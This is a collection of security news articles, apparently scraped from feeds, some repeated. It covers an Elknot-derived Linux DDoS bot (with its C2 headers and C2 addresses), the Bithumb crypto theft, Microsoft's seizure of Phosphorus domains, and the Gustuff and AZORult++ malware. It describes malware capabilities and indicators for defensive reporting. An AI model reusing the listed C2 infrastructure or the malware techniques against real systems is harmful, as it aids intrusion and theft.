Giving a look to the client bot we’ll see that once the malware has infected the remote host the installer ELF will read all server info by launching open(“/proc/{PID}/cmdline”) from which can create a specific information header to send to the C2 by using an encoding function to encrypt and decrypt the requests during the communication with the C2.

But what are the machine info and how are they collected?

Figure 3: Header of the ELF communication

This data is sent via the malware’s “fabricated” headers as follows:

Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: {SIZE OF SENT DATA}\r\n
Host: 193[.]201[.]224[.]238:8852\r\n

User-Agent: LuaSocket 3.0-rc1\r\n

TE: trailers\r\n
Connection: close, TE\r\n\r\n

and are being processed further in the C2 tool of the threat actor.

This is also new, Elknot will send its data to C2 always in the encoded form instead, with a lot of padding 00 in between.

After the initial communication a dropped (downloader) is saved and executed on the infected node and in the analysis Mr. unixfreaxjp says: “The dropped & executed downloader embedded ELF is actually the one that responsible for the persistence setup operation too. This part haven’t been seen in Elknot. And this is not even in the main sample file too. In THIS dropped ELF you can see well the downloader and the persistence installer in the same file.”

See the next figure for the explanation:

Figure 4: Snapshot of the Installer/downloader

To be very synthetic  the same connection is reused and the initial code that opens the connection toward the C2 is also responsible to manage the update of the malware on the infected node.

So only one dropped binary is the Elknot.” says Mr. unixfreaxjp, “Obviously, there is no DDoS functionality in the main sample ELF file or the Downloader ELF file too, the Elknot has it, and the adversary tend to use that function from the C2 tool.”

The Server Silde (C2 Tool)

Regarding the C2 tool we have a “win32” PE and it has the Elknot basis C2 form, along with many additional other forms as we reported in the Figure 2. We can see the scanner tool that command to inject code execution to open a shell after attack has been performed successfully. With this the threat actor can use any kind of compromised Windows machine to manage the C2 from its attacks.

To perform the malicious intent the attacker will need the ELF file to send, the script to be sent to hacked PC and the ELF file to be installed after infecting along with its execution toolset.

In order to have an idea on “how the adversary work in making this toolset” MMD has produced a very interesting video published on Youtube describing the techniques adopted  by the China threat actors

Elknot DDoS

Figure 5: MMD Video on Youtube describing China threat actors techniques to delivery malware and recording them live from a compromised server.

Reversing the C2 tool it smells of  China even if the reader is not able to translate.

Elknot DDoS

Figure 6: MMD reverse of the C2 Tool

The adversary network is as per below (domain, IP and port)

cctybt.com.     3600 IN A 103.119.28.12 tcp/8080

193.201.224.238 tcp/8852

Located in these networks:

AS136782 | 103.119.28.0/24 | PINGTAN-AS | AP Kirin Networks, CN

AS25092 | 193.201.224.0/22 | OPATELECOM, | UA

For the full IOCs and other details of the malware please refer to the Mr. unixfreaxjp research at: https://imgur.com/a/57uOiTu

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp team leader of the MalwareMustDie team.

Pierluigi Paganini

(SecurityAffairs – Elknot malware, DDoS)

The post New Linux/DDosMan threat emerged from an evolution of the older Elknot appeared first on Security Affairs.



Security Affairs

Security Affairs: Security Affairs newsletter Round 207 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Federal Emergency Management Agencys (FEMA) data leak exposes data of 2.3M survivors
Malware Static Analysis
Microsoft Defender APT now protects also macOS
WordPress Social Warfare plugin zero-day exploited in attacks
Anubis II – malware and afterlife
Free Tools: spotting APTs through Malware streams
Hackers raised fake tornado alarms in two Texas towns
Operation ShadowHammer – Supply-Chain attack hit ASUS users
PewDiePie ransomware oblige users subscribe to PewDiePie YouTube channel
Telegram allows users to delete any sent/received message from both sides with no time limit
How to get back files encrypted by the Hacked Ransomware for free
iOS 12.2 update addresses some troubling vulnerabilities
Microsoft experts found high severity flaws in Huawei PCManager
The Ursnif Gangs keep Threatening Italy
Whitehat settings allow white hat hackers to Test Facebook mobile apps
A new AZORult C++ variant can establish RDP connections
Experts found 36 vulnerabilities in the LTE protocol
LUCKY ELEPHANT campaign targets South Asian governments
Norsk Hydro estimates losses between $35M – $41M in the first week after cyberattack
Operation SaboTor – Police arrested 61 vendors and buyers in the dark web
Android Trojan Gustuff capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications
ASUS fixes supply chain of Live Update tool hit in Operation ShadowHammer
Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps
Lazarus APT continues to target cryptocurrency businesses with Mac malware
New Shodan Monitor service allows tracking Internet-Exposed devices
WinRAR CVE-2018-20250 flaw exploited in multiple campaigns
Commando VM – Using Windows for pen testing and red teaming
Google developer disclosed Zero-Day flaw in TP-Link SR20 Routers
Magento fixed a critical Magento SQL Injection flaw
Malware researchers decrypted the Qrypter Payload
Millions of Toyota customer records exposed in data breach
Victims of attacks in the Philippines are filing lawsuit against company enabling them
Exodus, a government malware that infected innocent victims
Expert disclosed two Zero-Day flaws in Microsoft browsers
Initial fixes for Cisco RV320 and RV325 routers were incomplete

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 207 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 207 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Federal Emergency Management Agencys (FEMA) data leak exposes data of 2.3M survivors
Malware Static Analysis
Microsoft Defender APT now protects also macOS
WordPress Social Warfare plugin zero-day exploited in attacks
Anubis II – malware and afterlife
Free Tools: spotting APTs through Malware streams
Hackers raised fake tornado alarms in two Texas towns
Operation ShadowHammer – Supply-Chain attack hit ASUS users
PewDiePie ransomware oblige users subscribe to PewDiePie YouTube channel
Telegram allows users to delete any sent/received message from both sides with no time limit
How to get back files encrypted by the Hacked Ransomware for free
iOS 12.2 update addresses some troubling vulnerabilities
Microsoft experts found high severity flaws in Huawei PCManager
The Ursnif Gangs keep Threatening Italy
Whitehat settings allow white hat hackers to Test Facebook mobile apps
A new AZORult C++ variant can establish RDP connections
Experts found 36 vulnerabilities in the LTE protocol
LUCKY ELEPHANT campaign targets South Asian governments
Norsk Hydro estimates losses between $35M – $41M in the first week after cyberattack
Operation SaboTor – Police arrested 61 vendors and buyers in the dark web
Android Trojan Gustuff capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications
ASUS fixes supply chain of Live Update tool hit in Operation ShadowHammer
Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps
Lazarus APT continues to target cryptocurrency businesses with Mac malware
New Shodan Monitor service allows tracking Internet-Exposed devices
WinRAR CVE-2018-20250 flaw exploited in multiple campaigns
Commando VM – Using Windows for pen testing and red teaming
Google developer disclosed Zero-Day flaw in TP-Link SR20 Routers
Magento fixed a critical Magento SQL Injection flaw
Malware researchers decrypted the Qrypter Payload
Millions of Toyota customer records exposed in data breach
Victims of attacks in the Philippines are filing lawsuit against company enabling them
Exodus, a government malware that infected innocent victims
Expert disclosed two Zero-Day flaws in Microsoft browsers
Initial fixes for Cisco RV320 and RV325 routers were incomplete

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 207 – News of the week appeared first on Security Affairs.

Hackers stole $19 Million from Bithumb cryptocurrency exchange

A new cyber heist made the headlines, the victim is Bithumb,
the South Korea-based cryptocurrency exchange and hackers stole $19 Million.

Hackers have stolen nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based cryptocurrency exchange.

The news was first reported by the Primitive Ventures’ Dovey Wan, hackers compromised a number of Bithumb’s hot EOS and XRP wallets and transferred around 3 million EOS (roughly $13 million) and 20 million XRP (~ $6 million) to accounts under their control.

Then crooks transferred the stolen funds to multiple accounts they operated on other cryptocurrency exchanges, including Huobi, HitBTC, WB, and EXmo, via ChangeNow, a non-custodial crypto swap platform that
has no maximum amount for crypto exchange.

Once the attack was discovered, Bithumb quickly halted its deposits and withdrawals process, the company also speculated that the incident allegedly involved insiders.

“About 10:15 pm on the 29th, we detected abnormal withdrawal of the company’s cryptocurrency through Bithumb’s abnormal trading monitoring system.” reads a statement published by the exchange.

“All the spilled cryptocurrency is owned by company, and all the member’s asset is under the protection of cold wallet.

According to the company’s manual, Bithumb secured all the cryptocurrency from the detection time with a cold wallet and checked them by blocking deposit and withdrawal service.

As a result of the internal inspection, it is judged that the incident is an “accident involving insiders”.”

Bithumb is conducting an intensive investigation along with KISA, Cyber Police Agency and security companies.

Bithumb was hacked multiple times in the past two years. In June 2018,
the South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20. In July 2017 hackers have stolen more than $1 Million in Bitcoin and Ether cryptocurrencies from the accounts of several users of the exchange.

Changpeng Zhao, CEO of Binance cryptocurrency exchange, posted an interesting representation of the way the attackers have distributed his funds after stealing it from Bithumb.

The attackers have stolen the private key for the EOS hot wallet account belonging to Bithumb (g4ydomrxhege) and used it to transfer the funds to the address “ifguz3chmamg” under their control.

“We deeply apologize to our members for delaying the cryptocurrency deposit and withdrawal service,” Bithumb said.

Bithumb is currently working with major cryptocurrency exchanges and foundations in the attempt of recovering the stolen crypto coins.

Pierluigi Paganini

(SecurityAffairs – cryptocurrency, hacking)

The post Hackers stole $19 Million from Bithumb cryptocurrency exchange appeared first on Security Affairs.

Security Affairs: Hackers stole $19 Million from Bithumb cryptocurrency exchange

A new cyber heist made the headlines, the victim is Bithumb,
the South Korea-based cryptocurrency exchange and hackers stole $19 Million.

Hackers have stolen nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based cryptocurrency exchange.

The news was first reported by the Primitive Ventures’ Dovey Wan, hackers compromised a number of Bithumb’s hot EOS and XRP wallets and transferred around 3 million EOS (roughly $13 million) and 20 million XRP (~ $6 million) to accounts under their control.

Then crooks transferred the stolen funds to multiple accounts they operated on other cryptocurrency exchanges, including Huobi, HitBTC, WB, and EXmo, via ChangeNow, a non-custodial crypto swap platform that
has no maximum amount for crypto exchange.

Once the attack was discovered, Bithumb quickly halted its deposits and withdrawals process, the company also speculated that the incident allegedly involved insiders.

“About 10:15 pm on the 29th, we detected abnormal withdrawal of the company’s cryptocurrency through Bithumb’s abnormal trading monitoring system.” reads a statement published by the exchange.

“All the spilled cryptocurrency is owned by company, and all the member’s asset is under the protection of cold wallet.

According to the company’s manual, Bithumb secured all the cryptocurrency from the detection time with a cold wallet and checked them by blocking deposit and withdrawal service.

As a result of the internal inspection, it is judged that the incident is an “accident involving insiders”.”

Bithumb is conducting an intensive investigation along with KISA, Cyber Police Agency and security companies.

Bithumb was hacked multiple times in the past two years. In June 2018,
the South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20. In July 2017 hackers have stolen more than $1 Million in Bitcoin and Ether cryptocurrencies from the accounts of several users of the exchange.

Changpeng Zhao, CEO of Binance cryptocurrency exchange, posted an interesting representation of the way the attackers have distributed his funds after stealing it from Bithumb.

The attackers have stolen the private key for the EOS hot wallet account belonging to Bithumb (g4ydomrxhege) and used it to transfer the funds to the address “ifguz3chmamg” under their control.

“We deeply apologize to our members for delaying the cryptocurrency deposit and withdrawal service,” Bithumb said.

Bithumb is currently working with major cryptocurrency exchanges and foundations in the attempt of recovering the stolen crypto coins.

Pierluigi Paganini

(SecurityAffairs – cryptocurrency, hacking)

The post Hackers stole $19 Million from Bithumb cryptocurrency exchange appeared first on Security Affairs.



Security Affairs

Hackers using hacked WordPress & Joomla sites to drop malware

By Waqas

Apparently, the malware attack is carried out by Russian speaking hackers. The IT security researchers at Zscaler have discovered a sophisticated malware campaign targeting websites based on WordPress and Joomla content management system (CMS). The campaign works in such a way that hackers take advantage of a hidden directory on HTTPS and exploit vulnerabilities in extensions, plugins, and themes […]

This is a post from HackRead.com Read the original post: Hackers using hacked WordPress & Joomla sites to drop malware

E Hacking News – Latest Hacker News and IT Security News: US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given the control of 99 websites which were being operated in association with an Iranian hacking group, Phosphorus. 

In order to prevent the sites from being employed for the execution of cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to be in charge of these websites related to the aforementioned hacking group which is also known as Charming Kitten, Ajax Security Team and APT 35.

The malicious group, Phosphorus is configured to employ spear-phishing to sneak into private accounts of individuals. Cybercriminals at Phosphorus resort to social engineering in order to lure individuals to click on the links, at times sent via fake accounts that appear to be of familiar contacts. The link carries infectious software which allows Phosphorus to sneak into the computer systems.

Basically, it performs malicious activity to acquire access to sensitive data stored onto the computer systems of government agencies and businesses.

Putting the same into context in a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, said, "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East,"

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt told in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."


E Hacking News - Latest Hacker News and IT Security News

US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given the control of 99 websites which were being operated in association with an Iranian hacking group, Phosphorus. 

In order to prevent the sites from being employed for the execution of cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to be in charge of these websites related to the aforementioned hacking group which is also known as Charming Kitten, Ajax Security Team and APT 35.

The malicious group, Phosphorus is configured to employ spear-phishing to sneak into private accounts of individuals. Cybercriminals at Phosphorus resort to social engineering in order to lure individuals to click on the links, at times sent via fake accounts that appear to be of familiar contacts. The link carries infectious software which allows Phosphorus to sneak into the computer systems.

Basically, it performs malicious activity to acquire access to sensitive data stored onto the computer systems of government agencies and businesses.

Putting the same into context in a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, said, "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East,"

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt told in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."

Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

By Uzair Amir

Microsoft has announced that it has seized some key websites that Iranian hackers used for stealing sensitive information from unsuspecting users in the US as well as launching cyber attacks. Reportedly, 99 websites have been seized by Microsoft of an Iranian hacker group that is known by many names including Phosphorus, Charming Kitten and APT […]

This is a post from HackRead.com Read the original post: Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

The rise of employees stealing data: how do businesses stop this from happening?

Employees currently think of stealing data, or taking corporate data with them, as a similar offence to taking paper clips home – technology, education and reassurance are required to stop

The post The rise of employees stealing data: how do businesses stop this from happening? appeared first on The Cyber Security Place.

Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps

Security experts at Group-IB have detected the activity of Gustuff a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces.

Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.

The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 inGermany, and 8 in India and users of 32 cryptocurrency apps.

Initially designed as a classic banking Trojan, in its current version, Gustuff has significantly expanded the list of potential targets, which now includes, besided banking, crypto services and fintech companies’ Android progarms, users of apps of marketplaces, online stores, payment systems and messengers, such as PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut etc.

Weapon of mass infection

Gustuff infects Android smartphones through SMS with links to malicious Android Package (APK) file, the package file format used by the Android operating system for distribution and installation of applications. When an Android device is infected with a Gustuff, at the server’s command Trojan spreads further through the infected device’s contact list or the server database. Gustuff’s features are aimed at mass infections and maximum profit for its operators – it has a unique feature – ATS (Automatic Transfer Systems), that autofills fields in legitimate mobile banking apps, cryptocurrency wallets and other apps, which both speeds and scales up thefts.

The analysis of the Trojan revealed that the ATS function is implemented with the help of the Accessibility Service, which is intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass security measures against interactions with other apps’ windows using Android Accessibility Service. That being said, the use of the Accessibility Service to perform ATS has so far been a relatively rare occurrence.

After being uploaded to the victim’s phone, the Gustuff uses the Accessibility Service to interact with elements of other apps’ windows including cryptocurrency wallets, online banking apps, messengers etc. The Trojan can perform a number of actions, for example, at the server’s command, Gustuff is able to change the values of the text fields in banking apps. Using the Accessibility Service mechanism means that the Trojan is able to bypass security measures used by banks to protect against older generation of mobile Trojans and changes to Google’s security policy introduced in new versions of the Android OS. Moreover, Gustuff knows how to turn off Google Protect; according to the Trojan’s developer, this feature works in 70% of cases.

Gustuff is also able to display fake push notifications with legitimate icons of the apps mentioned above. Clicking on fake push notifications has two possible outcomes: either a web fake downloaded from the server pops up and the user enters the requested personal or payment (card/wallet) details; or the legitimate app that purportedly displayed the push notification opens – and Gustuff at the server’s command and with the help of the Accessibility Service, can automatically fill payment fields for illicit transactions.

The malware is also capable of sending information about the infected device to the C&C server, reading/sending SMS messages, sending USSD requests, launching SOCKS5 Proxy, following links, transferring files (including document scans, screenshots, photos) to the C&C server, and resetting the device to factory settings.

“In order to better protect their clients against mobile Trojans, the companies need to use complex solutions which allow to detect and prevent malicious activity without additional software installation for end-user,” says Pavel Krylov, Head of Secure Bank at Group-IB. “Signature-based detection methods should be complemented with user and application behaviour analytics. Effective cyber defence should also incorporate a system of identification for customer devices (device fingerprinting) in order to be able to detect usage of stolen account credentials from unknown device. Another important element is cross-channel analytics that help to detect malicious activity in other channels.”                                                            

Used mainly outside Russia

Although the Trojan was developed by a Russian-speaking cybercriminal, Gustuff operates exclusively on international markets.

“All new Android Trojans offered on underground forums, including Gustuff, are designed to be used mainly outside Russia, and target customers of international companies,” saysRustam Mirkasymov, Head of Dynamic Analysis of Malware Department at Group-IB. “In Russia, after the owners of the largest Android botnets were arrested, the number of daily thefts decreased threefold, Trojans’ activity became significantly less widespread, and their developers focused to others markets.However some hackers “patch” (modify) the Trojan samples and reuse it in their attacks on users in Russia.”

Group-IB’s Threat Intelligence system first discovered Gustuff on hacker forums in April 2018. According to its developer, nicknamed Bestoffer, Gustuff became the new, updated version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money using web fakes disguised as mobile apps of prominent international banks and payment systems. Gustuff is a “serious product for individuals with skills and experience”, as advertised by the Trojan’s developer. The price for leasing the “Gustuff Bot” was $800 per month. Group-IB Threat Intelligence customers were notified about Gustuff upon discovery. A team of Group-IB analysts continue to research the Trojan.

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – Gustuff, Android banking Trojan)

The post Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps appeared first on Security Affairs.

Security Affairs: Android Trojan “Gustuff” capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications

Security experts at Group-IB have detected the activity of Gustuff a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces.

Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.

The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 inGermany, and 8 in India and users of 32 cryptocurrency apps.

Initially designed as a classic banking Trojan, in its current version, Gustuff has significantly expanded the list of potential targets, which now includes, besided banking, crypto services and fintech companies’ Android progarms, users of apps of marketplaces, online stores, payment systems and messengers, such as PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut etc.

Weapon of mass infection

Gustuff infects Android smartphones through SMS with links to malicious Android Package (APK) file, the package file format used by the Android operating system for distribution and installation of applications. When an Android device is infected with a Gustuff, at the server’s command Trojan spreads further through the infected device’s contact list or the server database. Gustuff’s features are aimed at mass infections and maximum profit for its operators – it has a unique feature – ATS (Automatic Transfer Systems), that autofills fields in legitimate mobile banking apps, cryptocurrency wallets and other apps, which both speeds and scales up thefts.

The analysis of the Trojan revealed that the ATS function is implemented with the help of the Accessibility Service, which is intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass security measures against interactions with other apps’ windows using Android Accessibility Service. That being said, the use of the Accessibility Service to perform ATS has so far been a relatively rare occurrence.

After being uploaded to the victim’s phone, the Gustuff uses the Accessibility Service to interact with elements of other apps’ windows including cryptocurrency wallets, online banking apps, messengers etc. The Trojan can perform a number of actions, for example, at the server’s command, Gustuff is able to change the values of the text fields in banking apps. Using the Accessibility Service mechanism means that the Trojan is able to bypass security measures used by banks to protect against older generation of mobile Trojans and changes to Google’s security policy introduced in new versions of the Android OS. Moreover, Gustuff knows how to turn off Google Protect; according to the Trojan’s developer, this feature works in 70% of cases.

Gustuff is also able to display fake push notifications with legitimate icons of the apps mentioned above. Clicking on fake push notifications has two possible outcomes: either a web fake downloaded from the server pops up and the user enters the requested personal or payment (card/wallet) details; or the legitimate app that purportedly displayed the push notification opens – and Gustuff at the server’s command and with the help of the Accessibility Service, can automatically fill payment fields for illicit transactions.

The malware is also capable of sending information about the infected device to the C&C server, reading/sending SMS messages, sending USSD requests, launching SOCKS5 Proxy, following links, transferring files (including document scans, screenshots, photos) to the C&C server, and resetting the device to factory settings.

“In order to better protect their clients against mobile Trojans, the companies need to use complex solutions which allow to detect and prevent malicious activity without additional software installation for end-user,” says Pavel Krylov, Head of Secure Bank at Group-IB. “Signature-based detection methods should be complemented with user and application behaviour analytics. Effective cyber defence should also incorporate a system of identification for customer devices (device fingerprinting) in order to be able to detect usage of stolen account credentials from unknown device. Another important element is cross-channel analytics that help to detect malicious activity in other channels.”                                                            

Used mainly outside Russia

Although the Trojan was developed by a Russian-speaking cybercriminal, Gustuff operates exclusively on international markets.

“All new Android Trojans offered on underground forums, including Gustuff, are designed to be used mainly outside Russia, and target customers of international companies,” saysRustam Mirkasymov, Head of Dynamic Analysis of Malware Department at Group-IB. “In Russia, after the owners of the largest Android botnets were arrested, the number of daily thefts decreased threefold, Trojans’ activity became significantly less widespread, and their developers focused to others markets.However some hackers “patch” (modify) the Trojan samples and reuse it in their attacks on users in Russia.”

Group-IB’s Threat Intelligence system first discovered Gustuff on hacker forums in April 2018. According to its developer, nicknamed Bestoffer, Gustuff became the new, updated version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money using web fakes disguised as mobile apps of prominent international banks and payment systems. Gustuff is a “serious product for individuals with skills and experience”, as advertised by the Trojan’s developer. The price for leasing the “Gustuff Bot” was $800 per month. Group-IB Threat Intelligence customers were notified about Gustuff upon discovery. A team of Group-IB analysts continue to research the Trojan.

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – Gustuff, Android banking Trojan)

The post Android Trojan “Gustuff” capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications appeared first on Security Affairs.



Security Affairs

Security Affairs: Operation SaboTor – Police arrested 61 vendors and buyers in the dark web

Operation SaboTor – A coordinated operation conducted by law enforcement agencies from Europe, Canada, and the United States targeted vendors and buyers of illegal goods on dark web marketplaces

The international operations, dubbed operation SaboTor, involved 17 countries, notably Germany, the Netherlands, Austria, and Portugal.

“During the course of this operation, international law enforcement agencies made 61 arrests and shut down 50 dark web accounts used for illegal activity.” reads the press release published by the Europol. “Law enforcement executed 65 search warrants, seizing 299,5 kg of drugs, 51 firearms, and over €6,2 million (almost €4 million in cryptocurrency, €2,2 million in cash, and €35 000 in gold). They also conducted 122 interviews.”

Operation sabotor

The operation resulted in the arrest of 61 people who are accused of trade of illegal goods and shut down for 50 dark web accounts involved in illegal activities. The police also seized nearly 300 kilos of drugs, 51 firearms, and over €6.2 million (Two-thirds were in virtual currency, the rest in cold hard cash). The police also conducted 122 interviews.

“Today, members of the Joint Criminal Opioid and Darknet Enforcement (J-CODE) team announce the results of Operation SaboTor, a coordinated international effort targeting drug trafficking organizations operating on the Darknet. This is J-CODE’s second coordinated action and follows the success of last year’s Operation Disarray.” reads the press release published by the FBI.

“As a result of Operation SaboTor, U.S. and international law enforcement agencies made 61 arrests and shut down 50 Darknet accounts used for illegal activity. Law enforcement executed 65 search warrants, seizing 299.5 kilograms of drugs, 51 firearms, and more than $7 million ($4.5 million in cryptocurrency, $2.48 million in cash, and $40,000 in gold).”

Operation SaboTor was conducted between January 11 and March 12, 2019, the preparation phase began in July 2018. The operation was composed of a series of separate but complementary joint operations aimed at fighting the opioid epidemic

Investigators used using information gathered in the first stage of the operations to identify 247 high-value targets and developed intelligence packages that were disseminated to the concerned countries for further handling.

Europol hopes this operation could discourage anyone who wants to conduct illegal activities believing that the dark web represents an inaccessible place for the police.

While the law enforcement shares the results of this operation, the admin of the top dark web marketplace Dream Market announced plans to shut down on April 30 after six years of activity,

Pierluigi Paganini

(SecurityAffairs – Dark Web, black marketplace)

The post Operation SaboTor – Police arrested 61 vendors and buyers in the dark web appeared first on Security Affairs.



Security Affairs

Operation SaboTor – Police arrested 61 vendors and buyers in the dark web

Operation SaboTor – A coordinated operation conducted by law enforcement agencies from Europe, Canada, and the United States targeted vendors and buyers of illegal goods on dark web marketplaces

The international operations, dubbed operation SaboTor, involved 17 countries, notably Germany, the Netherlands, Austria, and Portugal.

“During the course of this operation, international law enforcement agencies made 61 arrests and shut down 50 dark web accounts used for illegal activity.” reads the press release published by the Europol. “Law enforcement executed 65 search warrants, seizing 299,5 kg of drugs, 51 firearms, and over €6,2 million (almost €4 million in cryptocurrency, €2,2 million in cash, and €35 000 in gold). They also conducted 122 interviews.”

Operation sabotor

The operation resulted in the arrest of 61 people who are accused of trade of illegal goods and shut down for 50 dark web accounts involved in illegal activities. The police also seized nearly 300 kilos of drugs, 51 firearms, and over €6.2 million (Two-thirds were in virtual currency, the rest in cold hard cash). The police also conducted 122 interviews.

“Today, members of the Joint Criminal Opioid and Darknet Enforcement (J-CODE) team announce the results of Operation SaboTor, a coordinated international effort targeting drug trafficking organizations operating on the Darknet. This is J-CODE’s second coordinated action and follows the success of last year’s Operation Disarray.” reads the press release published by the FBI.

“As a result of Operation SaboTor, U.S. and international law enforcement agencies made 61 arrests and shut down 50 Darknet accounts used for illegal activity. Law enforcement executed 65 search warrants, seizing 299.5 kilograms of drugs, 51 firearms, and more than $7 million ($4.5 million in cryptocurrency, $2.48 million in cash, and $40,000 in gold).”

Operation SaboTor was conducted between January 11 and March 12, 2019, the preparation phase began in July 2018. The operation was composed of a series of separate but complementary joint operations aimed at fighting the opioid epidemic

Investigators used using information gathered in the first stage of the operations to identify 247 high-value targets and developed intelligence packages that were disseminated to the concerned countries for further handling.

Europol hopes this operation could discourage anyone who wants to conduct illegal activities believing that the dark web represents an inaccessible place for the police.

While the law enforcement shares the results of this operation, the admin of the top dark web marketplace Dream Market announced plans to shut down on April 30 after six years of activity,

Pierluigi Paganini

(SecurityAffairs – Dark Web, black marketplace)

The post Operation SaboTor – Police arrested 61 vendors and buyers in the dark web appeared first on Security Affairs.

A new AZORult C++ variant can establish RDP connections

Experts from Kaspersky observed a new C++ version of the AZORult data stealer that implements the ability to establish RDP connections.


The AZORult Trojan is one of the most popular data stealers in the Russian cybercrime underground. The AZORult stealer was first spotted in 2016 by Proofpoint that discovered it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only in July 2018, the authors released a substantially updated variant.

AZORult is able to collect targets browser history, login credentials, crypto-wallet files cookies, files from the infected systems, and more.

The malware has a relatively high price tag ($100), it supports a broad functionality (i.e. the use of .bit domains as C&C servers to protect owner anonymity and to make it difficult to block the C&C server), and has high performance.

The malware is also able to download additional payloads onto the infected machines.

The C++ version was first spotted in early March 2019, experts believe it was built by acolytes of CrydBrox, the initial AZORult author, who decided to pull the plug on it after AZORult 3.2 became too widely available.

“It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++.” reads the analysis published by Kaspersky. “The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible. “

The analysis of the malware reveals that the AZORult++is affected by several issues, suggesting that the project is in the very early stages of development.

ike many other threats it first checks the language ID of the target machine and stops its execution if it identifies Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek.

This C++ version is deficient compared to AZORult 3.3, it doesn’t support stealing a feature from many of the browsers and doesn’t implement a loader functionality.
A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3,

AZORult c++

Original AZORult 3.3 and AZORult++ uses the same algorithm for communication with the C&C server, they use the command format, the structure and method of storing harvested data, and encryption keys.

The malware maintains stolen data in RAM and does not write it to the hard disk to avoid detection.

The most concerning improvement for the C++ version is the ability to establish a remote connection to the compromised machines via RDP.

The malware creates a new, hidden administrator account on the machine, and sets a registry key to establish a Remote Desktop Protocol (RDP) connection.

